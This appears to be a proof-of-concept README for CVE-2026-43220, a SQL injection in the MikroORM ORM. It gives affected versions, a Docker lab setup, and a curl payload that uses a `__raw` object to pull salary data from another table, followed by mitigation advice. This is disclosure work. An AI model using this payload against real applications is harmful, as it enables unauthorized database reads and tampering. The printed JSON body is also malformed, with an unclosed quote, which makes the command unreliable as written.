📄 MikroORM 7.0.5 SQL Injection

#  CVE-2026-43220 MikroORM SQL Injection
    
    ★ CVE-2026-43220 MikroORM SQL Injection PoC ★
    
    https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1
    
    <br>
    
    # Overview
    > **CVE-2026-43220** is a **SQL Injection** vulnerability in **MikroORM**, a widely used TypeScript/Node.js ORM framework.  
    > When a user-supplied value containing a `__raw` property is passed to a **Custom Type column** without validation, MikroORM's `isRaw()` check identifies it as a trusted internal Raw SQL expression and inserts the attacker-controlled `sql` value directly into the generated query without type conversion or sanitization, causing **unintended execution of arbitrary SQL**.
    
    <br>
    
    # Affected Versions
    | Category | Version |
    |---|---|
    | **Vulnerable** | MikroORM **version ≤ 6.4.3** & **7.0.0 ≤ version ≤ 7.0.5** |
    | **Patched** | MikroORM **6.4.4** & **7.0.6** |
    
    <br>
    
    # Impact
    - Exfiltration of sensitive data from the database without authorization
    - Corruption or unintended modification of existing database records
    
    <br>
    
    # Environment
    ```bash
    docker build -t cve-2026-43220-mikroorm-vuln .
    docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln
    ```
    
    <br>
    
    # PoC
    After starting the vulnerable environment, follow the steps below to reproduce the attack.
    
    ## Step 1. Send a request with a malicious payload containing `__raw`
    Send a JSON body that includes a `__raw` property targeting a Custom Type column.
    ```bash
    curl -X POST http://localhost:3000/write \
      -H "Content-Type: application/json" \
      -d '{
        "author":"x",
        "title":"x,
        "content": {
          "__raw": true,
          "sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)"
        }
      }'
    ```
    
    ## Step 2. Check the HTTP response
    Verify that the API returns a successful response without any error,
    indicating that MikroORM accepted the malicious payload as a valid value.
    
    
    ## Step 3. Confirm sensitive data is exfiltrated into post content
    Verify that the `content` field of the created post contains the query result
    from the `salaries` table (e.g., `Alice: 5000 / Bob: 7000 / ...`),
    confirming that data from an unrelated table has been silently embedded
    into the response without any error or access control violation.
    
    <br>
    
    # Mitigation
    - Upgrade to **MikroORM 6.4.4** or later, which introduces origin verification in `isRaw()` to reject externally supplied `__raw` properties
    - Apply **whitelist-based input validation** to reject unexpected properties such as `__raw` before passing values to ORM layer
    
    <br>
    
    # Analysis
    - KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
    - EN: